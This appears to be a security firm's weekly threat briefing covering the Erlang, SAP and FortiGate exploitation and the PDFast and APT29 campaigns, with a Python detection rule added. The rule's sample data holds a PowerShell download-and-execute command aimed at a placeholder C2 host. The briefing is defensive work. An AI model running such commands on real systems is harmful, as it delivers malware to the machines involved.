April 28, 2025 Cyber Threat Intelligence Briefing
This week’s briefing covers:
00:00 - Intro and Situational Awareness
PoC Exploit Released for Erlang CVSS 10 Vulnerability
The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication.
NTLM Hash Leaking Vulnerability Actively Exploited
Check Point researchers report that they have detected active exploitation of CVE-2025-24054, a hash disclosure via spoofing vulnerability that was patched as part of Microsoft’s March patching cycle.
02:37 [VULNERABILITY] Exploitation of SAP NetWeaver Critical Vulnerability
SAP NetWeaver Visual Composer Metadata Uploader is not protected by proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
03:57 [CAMPAIGN] Exploitation of FortiGate Devices
Key Takeaways
- Additional reporting on exploitation of Fortinet devices suggests that 22,000 devices are impacted by the SYMLINK backdoor globally.
- Investigations continue into the threat group behind the backdoor.
- Fortinet and local government authorities have proactively reached out to impacted customers.
- Kroll has the capability to remotely detect the presence of the SYMLINK backdoor.
06:14 [CAMPAIGN] Widespread compromise through PDFast software
Key Takeaways
- Kroll has observed a wave of malicious activity surrounding “PDFast” software.
- The updater file ran via a scheduled task and downloaded and executed a binary from actor-controlled command-and-control (C2) domains through several PowerShell commands.
- Kroll detections and security technologies contained and eradicated the threat before further malicious actions were taken.
- The downloaded binary, named PDF.exe, was analyzed by Kroll; it creates and executes a randomly named PyArmor-packed executable.
- It is highly recommended to remove installations of PDFast and block the domains listed in the Indicator of Compromise table below.
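The execution chain described above (scheduled task, PowerShell download, binary dropped and run from a user-writable directory) is a good candidate for an endpoint detection rule. The following is an added example written for this briefing, not Kroll's detection logic; it assumes Sysmon-style process-creation fields (PID, parent PID, image path, command line), and the events and the C2 hostname are constructed placeholders rather than indicators from the campaign.

```python
"""Flag process-creation chains matching the PDFast pattern: a scheduled task
spawning PowerShell that downloads a binary, which then executes from a drop
directory. Sample events below are constructed for this example."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process (Sysmon "Image")
    cmdline: str    # full command line (Sysmon "CommandLine")


# Scheduled tasks are launched by the Task Scheduler service, hosted in an
# svchost.exe instance started with "-s Schedule" (assumption: default Windows layout).
SCHEDULE_SVC = re.compile(r"svchost\.exe.*-s\s+Schedule", re.IGNORECASE)
POWERSHELL = re.compile(r"(powershell|pwsh)\.exe$", re.IGNORECASE)
# Common PowerShell download primitives; extend for your environment.
DOWNLOAD_CMDLETS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)
# User-writable locations a dropped binary is likely to run from.
DROP_DIR = re.compile(r"\\(Temp|AppData\\Local|ProgramData)\\", re.IGNORECASE)


def find_suspicious_chains(events):
    """Return one hit per PowerShell process that (a) was started by the
    Task Scheduler service and (b) contains a download primitive, together
    with any child processes it launched from a drop directory."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not POWERSHELL.search(e.image) or not DOWNLOAD_CMDLETS.search(e.cmdline):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not SCHEDULE_SVC.search(parent.cmdline):
            continue
        children = [c for c in events if c.ppid == e.pid and DROP_DIR.search(c.image)]
        hits.append({"powershell_pid": e.pid, "dropped": [c.image for c in children]})
    return hits


# Constructed sample telemetry: one malicious chain and one benign, user-driven
# PowerShell download that must not be flagged. "c2.example.invalid" is a placeholder.
SAMPLE_EVENTS = [
    ProcessEvent(900, 4, r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"),
    ProcessEvent(1200, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -w hidden -c "Invoke-WebRequest http://c2.example.invalid/PDF.exe '
                 r'-OutFile $env:TEMP\PDF.exe; Start-Process $env:TEMP\PDF.exe"'),
    ProcessEvent(1500, 1200, r"C:\Users\alice\AppData\Local\Temp\PDF.exe",
                 r"C:\Users\alice\AppData\Local\Temp\PDF.exe"),
    ProcessEvent(4000, 1, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(1300, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -c "Invoke-WebRequest https://intranet.example.invalid/report.csv"'),
]

if __name__ == "__main__":
    for hit in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"scheduled-task PowerShell download, pid={hit['powershell_pid']}, "
              f"dropped={hit['dropped']}")
```

Requiring the Task Scheduler service as the parent is what keeps the rule quiet: interactive PowerShell downloads (the second PowerShell event above) share the same command-line primitives but are not flagged. The child-process join is informational; a hit with an empty `dropped` list still warrants a look at the task definition and the fetched domain.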
09:40 [CAMPAIGN] KTA014 (aka APT29) Phishing Campaign Deploying New Malware GRAPELOADER
Key Takeaways
- KTA014 is involved in a new phishing campaign targeting diplomats.
- This phishing campaign pretends to be an invitation to wine tasting events.
- The phishing email contains a link to download a zip file which contains new malware, named GRAPELOADER.
Dive deeper:
Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report
Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering
Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings
Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber
Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services
Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports
Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder